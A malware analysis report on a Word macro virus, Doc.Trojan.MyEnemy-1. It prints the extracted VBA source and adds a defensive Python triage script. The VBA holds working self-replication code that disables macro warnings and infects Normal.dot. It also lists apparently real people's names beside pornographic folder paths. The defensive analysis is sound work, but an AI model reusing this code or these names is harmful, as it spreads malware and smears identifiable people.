Doc.Trojan.MyEnemy-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 d50b8e69f5862a86…

MALICIOUS

Office (OLE)

Size: 56.5 KB
Created: 2003-11-20 14:02:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 7af7f07317fb06d577001a935f5322b7
SHA-1: dc4b0ef3e9a6561250fa90c50750f3898a3c71c1
SHA-256: d50b8e69f5862a869fc241199e7430bed0f2461a2f84c4e895bf36c886b44dba
Risk score: 120

Malware Insights

Doc.Trojan.MyEnemy-1 · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

ClamAV identifies the sample as Doc.Trojan.MyEnemy-1. The document carries VBA macros with document_open and document_close event handlers, so code runs automatically when the document is opened and again when it is closed. Both handlers start with On Error Resume Next and Options.VirusProtection = False, which silences Word's built-in macro warning, and then reach into ActiveDocument.VBProject and NormalTemplate.VBProject to read and rewrite macro code. On open, any document or Normal.dot module that does not contain the marker constant mrk is wiped (CodeModule.DeleteLines), clearing competing macros; on close, the virus body is copied line by line between the document and Normal.dot (CodeModule.InsertLines) and both are saved, so every document closed on an infected machine is written back to disk infected. This is the classic Word macro-infector pattern rather than a downloader: the visible excerpt contains no URL, no network or shell calls, and no obfuscation beyond Cyrillic string literals. The remainder of the visible code, under the comment 'Retaliate', fills arrays with personal names, directory paths (a Russian or an English 'My Documents' path chosen per target) and file names; the routine that consumes them lies in the truncated part of the module. On current Office builds, access to the VBProject object model is refused unless "Trust access to the VBA project object model" is enabled, and On Error Resume Next swallows that failure, so the replication is a silent no-op there, although the handlers themselves still run whenever macros are allowed.

Heuristics (3)

  • ClamAV: Doc.Trojan.MyEnemy-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.MyEnemy-1
  • VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open event handler present: the macro runs automatically when the document is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 21540 bytes
SHA-256: d108440d38e30d05d6d4c5e3388b113efba6169ad01f6f685b2c260fbf61c974

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Note on encoding: the module's string literals are Windows-1251 Cyrillic; olevba
' rendered them as Latin-1 mojibake. They are shown here re-decoded; the code is otherwise unchanged.
Dim acd, ntt As Object          ' only ntt is declared As Object; acd is an implicit Variant
Dim MyEnemy$(20, 1)             ' (name, target path) pairs for the 'Retaliate' payload
Dim MyPhoto$(10)
Dim MyVideo$(6)
Dim MyExten$(5)
Dim zw As Byte
' Marker by which the virus recognises its own module; the literal itself is meaningless text
Const mrk = "иу аиа иаеси отврщ озкз оисрвйА .ВрснпснФнрвкмс оаиип аауКмсаоо .В"
Private Sub CommandButton1_Click()
ыру                              ' calls a procedure named ыру, not present in the visible excerpt
End Sub
Private Sub document_open()
 On Error Resume Next
 Options.VirusProtection = False  ' turn off Word's macro warning
 Set acd = ActiveDocument.VBProject.VBComponents.Item(1)  ' active document's ThisDocument module
 Set ntt = NormalTemplate.VBProject.VBComponents.Item(1)  ' Normal.dot's ThisDocument module
 ' Wipe any module that does not carry the marker (removes competing macros, leaves Normal.dot empty for infection)
 If Not acd.CodeModule.Find(mrk, 1, 1, 1000, 1000) Then acd.CodeModule.DeleteLines 1, acd.CodeModule.CountOfLines
 If Not ntt.CodeModule.Find(mrk, 1, 1, 1000, 1000) Then ntt.CodeModule.DeleteLines 1, ntt.CodeModule.CountOfLines
End Sub
Private Sub document_close()
 On Error Resume Next
 Options.VirusProtection = False
 Set acd = ActiveDocument.VBProject.VBComponents.Item(1)
 Set ntt = NormalTemplate.VBProject.VBComponents.Item(1)
 s$ = ""
 ' Document has no code and will be saved as .doc/.dot: copy the virus body from Normal.dot into it
 If (acd.CodeModule.CountOfLines <= 1) And ((ActiveDocument.SaveFormat = wdFormatDocument) Or (ActiveDocument.SaveFormat = wdFormatTemplate)) Then
  v2 = 1
  For v = 1 To ntt.CodeModule.CountOfLines
   s$ = ntt.CodeModule.lines(v, 1)
   If s$ <> "" Then
    acd.CodeModule.insertlines v2, s$
    v2 = v2 + 1
   End If
  Next v
 End If
 ActiveDocument.Save              ' every closed document is saved, writing the infection to disk
 ' Normal.dot has no code: copy the virus body from the document into it
 If ntt.CodeModule.CountOfLines <= 1 Then
  v2 = 1
  For v = 1 To acd.CodeModule.CountOfLines
   s$ = acd.CodeModule.lines(v, 1)
   If s$ <> "" Then
    ntt.CodeModule.insertlines v2, s$
    v2 = v2 + 1
   End If
  Next v
 End If
 NormalTemplate.Save
 'Retaliate
 ' Target names (index 16 is never assigned)
 MyEnemy$(0, 0) = "Фролов О. А."
 MyEnemy$(1, 0) = "Емельяненко В. В."
 MyEnemy$(2, 0) = "Подгорнова Е. И."
 MyEnemy$(3, 0) = "Матросова Ольга Евгеньевна"
 MyEnemy$(4, 0) = "Ковалева О Ю"
 MyEnemy$(5, 0) = "Мосин К. П."
 MyEnemy$(6, 0) = "Шалыгин П. С."
 MyEnemy$(7, 0) = "Лихтер Анатолий Михайлович"
 MyEnemy$(8, 0) = "А. М. Карпов"
 MyEnemy$(9, 0) = "Козлов Андрей Александрович"
 MyEnemy$(10, 0) = "Павлова Ольга"
 MyEnemy$(11, 0) = "Дмитриев Сергей"
 MyEnemy$(12, 0) = "Bob Klein"
 MyEnemy$(13, 0) = "Jim Rein"
 MyEnemy$(14, 0) = "John A. Hopkins"
 MyEnemy$(15, 0) = "Garry Wood"
 MyEnemy$(17, 0) = "Debra Henriksen"
 MyEnemy$(18, 0) = "Patricia "
 MyEnemy$(19, 0) = "Hitler"
 
 ' Per-target base path: the Russian-named targets (0-11) and index 19 get the localized
 ' "C:\Мои документы" ("My Documents" on Russian Windows), the rest the English path
 For v = 0 To 19
  If (v <= 11) Or (v = 19) Then
   MyEnemy$(v, 1) = "C:\Мои документы"
  Else
   MyEnemy$(v, 1) = "C:\My documents"
  End If
 Next v
 ' Subfolder per target: Russian and English pornographic terms and personal names (left as data, not translated)
 MyEnemy$(0, 1) = MyEnemy$(0, 1) + "\Траханье\"
 MyEnemy$(1, 1) = MyEnemy$(1, 1) + "\Порно\"
 MyEnemy$(2, 1) = MyEnemy$(2, 1) + "\Секс\"
 MyEnemy$(3, 1) = MyEnemy$(3, 1) + "\Извращения\"
 MyEnemy$(4, 1) = MyEnemy$(4, 1) + "\Трах\"
 MyEnemy$(5, 1) = MyEnemy$(5, 1) + "\Клубничка\"
 MyEnemy$(6, 1) = MyEnemy$(6, 1) + "\Девушки\Геля\"
 MyEnemy$(7, 1) = MyEnemy$(7, 1) + "\Фотки девушек\Комиссарова Ангелина Витальевна\"
 MyEnemy$(8, 1) = "C:\Только для меня\Порнуха\Гелка\"  ' "Только для меня" = "For me only"; replaces the base path
 MyEnemy$(9, 1) = MyEnemy$(9, 1) + "\Обнаженная натура\Ангелина\"
 MyEnemy$(10, 1) = MyEnemy$(10, 1) + "\Секс_коллекция\Комиссарова_А_В\"
 MyEnemy$(11, 1) = MyEnemy$(11, 1) + "\Лучшие попки города\"
 MyEnemy$(12, 1) = MyEnemy$(12, 1) + "\Russian Porno\"
 MyEnemy$(13, 1) = MyEnemy$(13, 1) + "\Russian Girls\Comissarova\"
 MyEnemy$(14, 1) = MyEnemy$(14, 1) + "\Russian Fuck\Gelka"
 MyEnemy$(15, 1) = MyEnemy$(15, 1) + "\Nudo\G\"
 MyEnemy$(16, 1) = MyEnemy$(16, 1) + "\Sex Show 1\Gela\"
 MyEnemy$(17, 1) = MyEnemy$(17, 1) + "\Sex Collection\"
 MyEnemy$(18, 1) = MyEnemy$(18, 1) + "\Crazy Sex\"
 MyEnemy$(19, 1) = MyEnemy$(19, 1) + "\Выставка секса\Россия\Астрахань\"
 
 ' File name stems, presumably combined with the paths and MyExten$ in the truncated part
 MyPhoto$(0) = "Angelina"
 MyPhoto$(1) = "Gela"
 MyPhoto$(2) = "Body_A"
 MyPhoto$(3) = "Fuck"
 MyPhoto$(4) = "Fuck_ass"
 MyPhoto$(5) = "Ass"
 MyPhoto$(6) = "Cnt"
 MyPhoto$(7) = "Klzm"
 MyPhoto$(8) = "Kk"
 MyPhoto$(9) = "Urn"
 
 MyVideo$(0) = "Gela&Seryj"
 My
... (truncated)
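The two things a reviewer wants to do with an olevba dump like the one above are to re-decode the string literals (olevba decoded this Word 8.0 module as Latin-1, so the Windows-1251 Cyrillic came out as mojibake) and to flag the handful of constructs that make it a Word macro infector: auto-exec event handlers, Options.VirusProtection = False, VBProject access, CodeModule writes and a save of Normal.dot. The script below is an added example written for this page, not part of the analysis platform's tooling and not the malware's own code. It uses only the Python standard library; the indicator names and the short SAMPLE_VBA excerpt (a few lines copied from the module above, constructed for the demonstration) are this example's own choices.

```python
"""Triage helper for an olevba-extracted VBA module such as macros.bas above.

Added example (not the page's tooling). Standard library only.
  1. fix_mojibake(): undo the Latin-1 decode of Windows-1251 bytes.
  2. triage(): flag macro-infector indicators and return a verdict.
"""
import re
from typing import Dict, List

# Constructed excerpt that mirrors the structure of the extracted module
# (a handful of lines from the sample, not the full file).
SAMPLE_VBA = r'''
Const mrk = "èó àèà èàåñè"
Private Sub document_open()
 On Error Resume Next
 Options.VirusProtection = False
 Set acd = ActiveDocument.VBProject.VBComponents.Item(1)
 Set ntt = NormalTemplate.VBProject.VBComponents.Item(1)
 If Not acd.CodeModule.Find(mrk, 1, 1, 1000, 1000) Then acd.CodeModule.DeleteLines 1, acd.CodeModule.CountOfLines
End Sub
Private Sub document_close()
 ntt.CodeModule.insertlines v2, s$
 NormalTemplate.Save
 MyEnemy$(0, 0) = "Ôðîëîâ Î. À."
 MyEnemy$(0, 1) = "C:\Ìîè äîêóìåíòû"
End Sub
'''

# Indicator label -> pattern. The labels are this example's own names, not a standard taxonomy.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "autoexec_handler": re.compile(
        r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
        r"(?:Document_Open|Document_Close|Document_New|AutoOpen|AutoClose|AutoExec|AutoNew)\b",
        re.I | re.M),
    "virusprotection_off": re.compile(r"Options\.VirusProtection\s*=\s*False", re.I),
    "vbproject_access": re.compile(r"\.VBProject\.VBComponents\b", re.I),
    "codemodule_write": re.compile(r"\.CodeModule\.(?:InsertLines|AddFromString|DeleteLines)\b", re.I),
    "normal_template_save": re.compile(r"\bNormalTemplate\.Save\b", re.I),
}


def fix_mojibake(text: str) -> str:
    """Undo a Latin-1 decode of Windows-1251 bytes.

    Each Cyrillic byte became the Latin-1 character with the same code point, so
    re-encoding as Latin-1 restores the bytes and decoding them as cp1251 restores
    the Cyrillic. Text that cannot round-trip is returned unchanged.
    """
    try:
        return text.encode("latin-1").decode("cp1251")
    except UnicodeError:
        return text


def string_literals(vba: str) -> List[str]:
    """Contents of every VBA string literal; a doubled quote inside a literal is an escaped quote."""
    return [m.group(1).replace('""', '"') for m in re.finditer(r'"((?:[^"]|"")*)"', vba)]


def triage(vba: str) -> Dict[str, object]:
    """Scan VBA source and return indicator hits, re-decoded literals and a verdict."""
    hits = {name: sorted({m.group(0).strip() for m in rx.finditer(vba)})
            for name, rx in INDICATORS.items()}
    literals = string_literals(vba)
    decoded = [fix_mojibake(s) for s in literals]
    # A literal counts as mojibake when re-decoding changed it.
    mojibake_count = sum(1 for a, b in zip(literals, decoded) if a != b)
    if hits["autoexec_handler"] and hits["vbproject_access"] and hits["codemodule_write"]:
        verdict = "macro-infector"      # self-replication through the VBA project object model
    elif hits["autoexec_handler"]:
        verdict = "suspicious-autoexec"
    else:
        verdict = "no-autoexec"
    return {"indicators": hits, "decoded_strings": decoded,
            "mojibake_literals": mojibake_count, "verdict": verdict}


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    print("verdict:", result["verdict"])
    for name, found in result["indicators"].items():
        print(f"{name}: {found}")
    for s in result["decoded_strings"]:
        print("literal:", s)
```

To run it over the real artifact, read macros.bas with whatever encoding it was saved in (UTF-8 if the olevba output was written as text) and pass the string to triage(); fix_mojibake() only changes literals that round-trip through Latin-1, so an already-correct Cyrillic dump is left alone. The regexes are deliberately plain because this sample is not obfuscated; a module that builds names with Chr() or StrReverse() would slip past them and needs olevba's own deobfuscation first.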